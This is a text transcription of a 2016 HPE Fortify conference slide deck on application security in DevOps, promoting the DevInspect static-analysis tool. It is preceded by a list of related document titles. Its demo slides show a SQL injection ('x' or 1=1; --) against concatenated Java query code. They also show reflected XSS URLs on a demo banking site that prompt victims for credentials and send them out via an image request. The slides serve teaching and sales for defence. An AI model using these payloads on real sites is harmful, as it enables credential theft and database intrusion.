Discover Best of Show März 2016, Düsseldorf

Similar documents
Micro Focus Fortify Application Security

Micro Focus Security Fortify. Application Security

Brochure. Security. Fortify on Demand Dynamic Application Security Testing

Effective Application Security Testing at High Velocity: Keeping up with Agile / DevOps February 28, 2017 Today s Speaker:

Application Security at Scale

Continuously Discover and Eliminate Security Risk in Production Apps

AppScan Deployment APPLICATION SECURITY SERVICES. Colin Bell. Applications Security Senior Practice Manager

Application security : going quicker

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

How to spend $3.6M on one coding mistake and other fun stuff you can do with $3.6M. Matias Madou Ph.D., Secure Code Warrior

MARCH Secure Software Development WHAT TO CONSIDER

Put Security Into Your DevOps NOW. Or Prepare for the Flood Matthew Fisher Solution Architect, Fortify Federal 08MAR2018

Automating the Top 20 CIS Critical Security Controls

SECURITY TESTING. Towards a safer web world

BUYER S GUIDE APPLICATION SECURITY BUYER S GUIDE:

Managed Application Security trends and best practices in application security

OWASP Top 10 The Ten Most Critical Web Application Security Risks

OWASP 5/07/09. The OWASP Foundation OWASP Static Analysis (SA) Track Session 1: Intro to Static Analysis

CONTRAST ASSESS MARKET-DEFINING APPLICATION SECURITY TESTING FOR MODERN AGILE AND DEVOPS TEAMS WHITEPAPER

Securing Your Web Application against security vulnerabilities. Alvin Wong, Brand Manager IBM Rational Software

Fortify SCA Workshop Exercises. Haleh Nematollahy Sr. Security Solutions Architect

V Conference on Application Security and Modern Technologies

C1: Define Security Requirements

Weaving Security into Every Application

SOLUTION BRIEF esentire Risk Advisory and Managed Prevention (RAMP)

HP Fortify Software Security Center

CISO Success Strategies: On Becoming a Security Business Leader

8 Must Have. Features for Risk-Based Vulnerability Management and More

Prep Work Exercises. Open Your VM c:\vm Images\2017\windows 10 x64 (2).vmx UID: Admin PWD:

THE ART OF SECURING 100 PRODUCTS. Nir

Prep Work Exercises. Open Your VM c:\vm Images\2017\windows 10 x64 (2).vmx. Check Access to

RSA INCIDENT RESPONSE SERVICES

Proactive Approach to Cyber Security

THE FUTURE OF APPSEC AUTOMATION WHY YOUR APPSEC EXPERTS ARE KILLING YOU. Jeff Williams,

Nathan Desmet. Lead Engineer

May Capabilities to help expand and. mature SWA program. Haleh Nematollahy Sr. Security Solutions Architect

How to Secure Your Cloud with...a Cloud?

Fortify Software Security Content 2017 Update 4 December 15, 2017

How to Underpin Security Transformation With Complete Visibility of Your Attack Surface

AWS Reference Design Document

HPE Security Fortify Plugins for Eclipse

QUICK WINS: Why You Must Get Defensive About Application Security

Product Security Program

Application Security Use Cases. RASP, WAF, NGWAF, What The Hell is The Difference.

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

A SEISMIC SHIFT IN APPLICATION SECURITY HOW TO INTEGRATE AND AUTOMATE SECURITY IN THE DEVOPS LIFECYCLE

Mobile Malfeasance. Exploring Dangerous Mobile Code. Jason Haddix, Director of Penetration Testing

EasyCrypt passes an independent security audit

#MicroFocusCyberSummit

Improving Security in the Application Development Life-cycle

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

THE BUSINESS CASE FOR OUTSIDE-IN DATA CENTER SECURITY

THE THREE WAYS OF SECURITY. Jeff Williams Co-founder and CTO Contrast Security

IBM Cloud Security for the Cloud. Amr Ismail Security Solutions Sales Leader Middle East & Pakistan

Micro Focus Fortify. Andy Earle Sr. Security Solutions Architect. Haleh Nematollahy Sr. Security Solutions Architect

Practical Guide to Securing the SDLC

with Advanced Protection

PT Unified Application Security Enforcement. ptsecurity.com

A Strategic Approach to Web Application Security

DevOps A How To for Agility with Security

Security Solutions. Overview. Business Needs

Help Your Security Team Sleep at Night

Hardening Attack Vectors to cars by Fuzzing

Robots with Pentest Recipes:

NOTHING IS WHAT IT SIEMs: COVER PAGE. Simpler Way to Effective Threat Management TEMPLATE. Dan Pitman Principal Security Architect

Hacker Attacks on the Horizon: Web 2.0 Attack Vectors

PCI Compliance Assessment Module with Inspector

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

THE MAIN APPLICATION SECURITY TECHNOLOGIES TO ADOPT BY 2018

Securing Cloud Applications with a Distributed Web Application Firewall Riverbed Technology

You ve Been Hacked: Why Web Application Security Programs Should Start with RASP

Designing an Adaptive Defense Security Architecture. George Chiorescu FireEye

ShiftLeft. Real-World Runtime Protection Benchmarking

To Audit Your IAM Program

Hacking 102 Integrating Web Application Security Testing into Development

Suman Sourav Director DevSecOps, Vantage Point Security. OWASP Indonesia Day 2017

Web Applications Penetration Testing

Cyber security tips and self-assessment for business

THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION BREACH & ATTACK SIMULATION

Converged security. Gerben Verstraete, CTO, HP Software Services Colin Henderson, Managing Principal, Enterprise Security Products

DevOps Anti-Patterns. Have the Ops team deal with it. Time to fire the Ops team! Let s hire a DevOps unit! COPYRIGHT 2019 MANICODE SECURITY

An SDLC for the DevSecOps Era Or SecDevOps, or DevOpsSec,

Managing an Application Vulnerability Management Program in a CI/CD Environment. March 29, 2018 OWASP Vancouver - Karim Lalji 1

Vulnerability & Attack Injection for Web Applications

CSWAE Certified Secure Web Application Engineer

Micro Focus Security Fortify Audit Assistant

Reinvent Your 2013 Security Management Strategy

Perfect Balance of Public and Private Cloud

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Hybrid 2.0 In search of the holy grail

Hello, and welcome to a searchsecurity.com. podcast: How Security is Well Suited for Agile Development.

Mapping Your Requirements to the NIST Cybersecurity Framework. Industry Perspective

RSA INCIDENT RESPONSE SERVICES

CAMSCANNER TURN YOUR PHONE AND TABLET INTO SCANNER FOR

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Engineering Your Software For Attack

Cyber Security Audit & Roadmap Business Process and

Integrated Access Management Solutions. Access Televentures

Secure DevOps: A Puma s Tail

WHITEPAPER THE EVOLUTION OF APPSEC: FROM WAFS TO AUTONOMOUS APPLICATION PROTECTION

Transcription:

Discover Best of Show 2016 2. - 3. März 2016, Düsseldorf

2. - 3. März 2016 Softwaresicherheit im Zeitalter von DevOps Lucas von Stockhausen Regional Product Manager Fortify

The case for Application Security I am secure I have a firewall 3

Malware over the years HPE Security Research Cyber Risk Report 2016 4

There is a breach in the headlines almost every day http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/ 5

Casualties Accidents Aircraft Accidents over the years 3000 Aircraft Accidents 140 2500 120 2000 100 1500 80 60 1000 40 500 20 0 0 Year Casualties Accidents Number of accidents and fatalities per year (excluding sabotage, shoot-downs) https://aviation-safety.net/statistics/period/ 6

The increase in attacks is constant Ponemon Cost of Cyber Crime Study 2012 Ponemon Cost of Cyber Crime Study 2015 7

Existing network and perimeter based security is insufficient 1 2 3 4 5 6 7 8 84% of breaches exploit vulnerabilities in the application layer Yet the ratio of spending between perimeter security and application security is 23-to-1 - Gartner Maverick Research: Stop Protecting Your Apps; It s Time for Apps to Protect Themselves (2014)

Basic hacking example 9

Live example SQL Injection Telnet Cross site scripting 10

SQL-Injection String username = ctx.getauthenticatedusername(); String itemname = request.getparameter("itemname"); String query = "SELECT * FROM items WHERE owner = '" + username + "' AND itemname = '" + itemname + "'"; ResultSet rs = stmt.execute(query); String username = ctx.getauthenticatedusername(); String itemname = request.getparameter("itemname"); String query = "SELECT * FROM items WHERE owner = '" + lucas+ "' AND itemname = '" + "x' or 1=1; -- + "'"; ResultSet rs = stmt.execute(query); username = lucas itemname = "x' or 1=1; -- SELECT * FROM items WHERE owner = 'lucas' AND itemname = 'x' or 1=1; -- '"

SQL-Injection 12

Telnet session 13

XSS Cross Site Scripting 14

Real word payloads 15

Real-world payloads So, what is XSS truly capable off What can you execute?

Real-world payloads Simple answer: JavaScript

Real-world payloads Simple answer: JavaScript Wait. That weak-sauce web scripting language that you had to learn in college back in the day? How bad could it be?

Real-world payloads Javascript is a full-featured programming language Object-oriented C-like syntax Extremely powerful Native in every browser

Real-world payloads In sum, being able to run JavaScript on a victim s browser has a LOT of potential

Real-world payloads In sum, being able to run JavaScript on a victim s browser has a LOT of potential Let s take a look at a possible attack and how to build it up Let s go to http://legacy.webapsecurity.com

Real-world payloads http://legacy.webapsecurity.com

Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>

Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); alert("username="%2b%0ausername%2b%0a" and password="%2b%0apassword);</script>

Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); document.write('<img src="http://localhost:8080/splc/images/top.jpg" alt=""'); document.write('<br>invalid Login: '%2B%0Ausername);</script>

Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); document.write('<img src="http://localhost:8080/splc/listmyitems.do?username='%2busername%2b'%26password='%2bpasswo rd%2b'">'); document.write('<br>invalid Login: '%2Busername);</script>

Real-world payloads There are many other possibilities and Opportunities Remember, if these are the easy options, imagine what others are capable of!

Real-world payloads There are a number of ways to launch the actual attack Stored XSS Reflected XSS Owning a page that a victim visits Remember, navigating to a page is permission to run what s on that page Consider visiting a webpage is an act of significant trust

What is the reason 29

Today s approach > expensive, reactive 1 Somebody builds insecure software IT deploys the insecure software We convince & pay the developer to fix it 2 4 We are breached or pay someone to tell us our code is insecure 3

Cost Why it doesn t work 30x more costly to secure in production 30X 10X 15X 5X 2X Requirements Coding Integration/ component testing System testing Production After an application is released into Production, it costs 30x more than during design. Source: NIST

The right approach > systematic, proactive Embed security into SDLC development process 1 2 In-house Outsourced Commercial Open source Leverage Security Gate to validate resiliency of internal or external code before Production 3 Improve SDLC policies Monitor and protect software running in Production This is application security

The help Static Application Security Testing (SAST) Dynamic Application Security Testing (DAST) Interactive Application Security Testing (IAST) Runtime Application Self Protection (RASP)

Example Process for Analysis Development Teams Security AWB 2. Audit Defect Tracking System Monitor CM Project Security Lead Source Code Repository(s) CISO 3. Assign CM Central Build Server(s) Build Tool Fortify SCA 5. Validate AWB WebInspect Development Manager 1. Identify Security Auditor IDE 4. Fix Fortify CM Fortify SSC Server 6. Report Developer

Movement to DevOps Business leaders have Agility at the top of their priorities as they prepare for the fast-paced, very competitive future. Processes need to be further streamlined, minimize resource consumption and reduce time-to-market. Security context Development organizations can save time and money by building in security early in the development process 35

Challenges in a DevOps environment Developers are not security experts Security testing is an afterthought Pressure to push out software into production leaves no time for security Security assessment take up resources 36

Introducing HPE Security DevInspect Bringing application security closer to the Developer AppSec solution created for developers to identify and remediate security vulnerabilities in source code within the native developers environment. Brings market-leading AppSec technologies directly to the developer, ensuring secure code as your shift left in your dev process. Real-time, instant security results as the developer is writing code. Enable developers to assess for security weaknesses. 37

End to End Application Security Static Dynamic Runtime On-premise DevInspect App Defender On-demand Fortify on Demand App Defender Application Development 38

HPE Security DevInspect: Static Code Analysis Real-time lightweight analysis of the source code Dynamic Analysis Runtime Analysis Documentation 39

What s included in DevInspect 1.0? Static Code Analysis Real-time lightweight analysis of the source code Integration for Fortify Software Security Center (SSC) Integration for Fortify on Demand (FoD) Documentation 40

Key Benefits DESIGNED FOR THE DEVELOPER Fully integrated into the native development environment (IDE) Supports the DevOps toolchain Providing thorough and robust software security analysis of an application INSTANT RESULTS (Fast) Inline analysis of the source code as the developer types providing immediate feedback Out of the box results no configuration required CONTINUOUS FEEDBACK Continuously updated security findings as code is written Tracks findings and guided developers toward remediation 41

Example Process for Static Analysis in DevOps Development Teams Security AWB Defect Tracking System Monitor CM Project Security Lead Source Code Repository(s) CISO CM Central Build Server(s) Build Tool Fortify SCA 4. Validate AWB WebInspect Development Manager 1. DevInspect IDE 2. Checkin 3. Milestone Scan Fortify CM Fortify SSC Server Security Auditor 5. Report Developer

Security Assistant Real-time lightweight analysis of the source code Fortify menu for additional options Fortify Icon added to icon bar Detailed remediation advice Vulnerable line of code highlighted & Tool tip for additional information All issues detected in the project 43

Thank you lvonstockhausen@hpe.com 44

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback